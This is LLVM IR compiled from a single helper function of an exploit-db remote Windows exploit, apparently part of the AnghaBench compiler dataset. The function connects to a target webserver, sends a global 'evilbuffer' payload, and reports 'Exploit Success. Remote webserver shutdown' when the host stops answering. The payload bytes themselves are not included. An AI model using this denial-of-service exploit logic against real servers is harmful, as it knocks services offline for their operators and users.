; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/remote/extr_21225.c_isalive.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/remote/extr_21225.c_isalive.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.sockaddr_in = type { %struct.TYPE_2__, i32, i32 }
%struct.TYPE_2__ = type { i32 }
%struct.sockaddr = type { i32 }

@port = common dso_local global i32 0, align 4
@AF_INET = common dso_local global i32 0, align 4
@ip = common dso_local global i32 0, align 4
@SOCK_STREAM = common dso_local global i32 0, align 4
@IPPROTO_TCP = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [31 x i8] c" [-] Unable to Create Socket\0A\0A\00", align 1
@.str.1 = private unnamed_addr constant [49 x i8] c" [+] Exploit Success. Remote webserver shutdown\0A\00", align 1
@.str.2 = private unnamed_addr constant [25 x i8] c" [-] Unable to connect\0A\0A\00", align 1
@.str.3 = private unnamed_addr constant [39 x i8] c" [-] Exploit Failed. System Patched?\0A\0A\00", align 1
@evilbuffer = common dso_local global i32 0, align 4
@.str.4 = private unnamed_addr constant [35 x i8] c" [+] Data Sent. Now Checking Host\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @isalive(i32 %0) #0 {
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = alloca %struct.sockaddr_in, align 4
  %5 = alloca i32, align 4
  store i32 %0, i32* %3, align 4
  %6 = load i32, i32* @port, align 4
  %7 = call i32 @htons(i32 %6)
  %8 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %4, i32 0, i32 2
  store i32 %7, i32* %8, align 4
  %9 = load i32, i32* @AF_INET, align 4
  %10 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %4, i32 0, i32 1
  store i32 %9, i32* %10, align 4
  %11 = load i32, i32* @ip, align 4
  %12 = call i32 @inet_addr(i32 %11)
  %13 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %4, i32 0, i32 0
  %14 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %13, i32 0, i32 0
  store i32 %12, i32* %14, align 4
  %15 = load i32, i32* @AF_INET, align 4
  %16 = load i32, i32* @SOCK_STREAM, align 4
  %17 = load i32, i32* @IPPROTO_TCP, align 4
  %18 = call i32 @socket(i32 %15, i32 %16, i32 %17)
  store i32 %18, i32* %5, align 4
  %19 = icmp eq i32 %18, -1
  br i1 %19, label %20, label %22

20:                                               ; preds = %1
  %21 = call i32 @printf(i8* getelementptr inbounds ([31 x i8], [31 x i8]* @.str, i64 0, i64 0))
  store i32 0, i32* %2, align 4
  br label %50

22:                                               ; preds = %1
  %23 = load i32, i32* %5, align 4
  %24 = bitcast %struct.sockaddr_in* %4 to %struct.sockaddr*
  %25 = call i32 @connect(i32 %23, %struct.sockaddr* %24, i32 12)
  %26 = icmp eq i32 %25, -1
  br i1 %26, label %27, label %35

27:                                               ; preds = %22
  %28 = load i32, i32* %3, align 4
  %29 = icmp eq i32 %28, 0
  br i1 %29, label %30, label %32

30:                                               ; preds = %27
  %31 = call i32 @printf(i8* getelementptr inbounds ([49 x i8], [49 x i8]* @.str.1, i64 0, i64 0))
  br label %34

32:                                               ; preds = %27
  %33 = call i32 @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str.2, i64 0, i64 0))
  br label %34

34:                                               ; preds = %32, %30
  store i32 0, i32* %2, align 4
  br label %50

35:                                               ; preds = %22
  %36 = load i32, i32* %3, align 4
  %37 = icmp eq i32 %36, 0
  br i1 %37, label %38, label %40

38:                                               ; preds = %35
  %39 = call i32 @printf(i8* getelementptr inbounds ([39 x i8], [39 x i8]* @.str.3, i64 0, i64 0))
  br label %49

40:                                               ; preds = %35
  %41 = load i32, i32* %5, align 4
  %42 = load i32, i32* @evilbuffer, align 4
  %43 = load i32, i32* @evilbuffer, align 4
  %44 = call i32 @strlen(i32 %43)
  %45 = call i32 @send(i32 %41, i32 %42, i32 %44, i32 0)
  %46 = call i32 @printf(i8* getelementptr inbounds ([35 x i8], [35 x i8]* @.str.4, i64 0, i64 0))
  %47 = load i32, i32* %5, align 4
  %48 = call i32 @closesocket(i32 %47)
  br label %49

49:                                               ; preds = %40, %38
  store i32 1, i32* %2, align 4
  br label %50

50:                                               ; preds = %49, %34, %20
  %51 = load i32, i32* %2, align 4
  ret i32 %51
}

declare dso_local i32 @htons(i32) #1

declare dso_local i32 @inet_addr(i32) #1

declare dso_local i32 @socket(i32, i32, i32) #1

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @connect(i32, %struct.sockaddr*, i32) #1

declare dso_local i32 @send(i32, i32, i32, i32) #1

declare dso_local i32 @strlen(i32) #1

declare dso_local i32 @closesocket(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
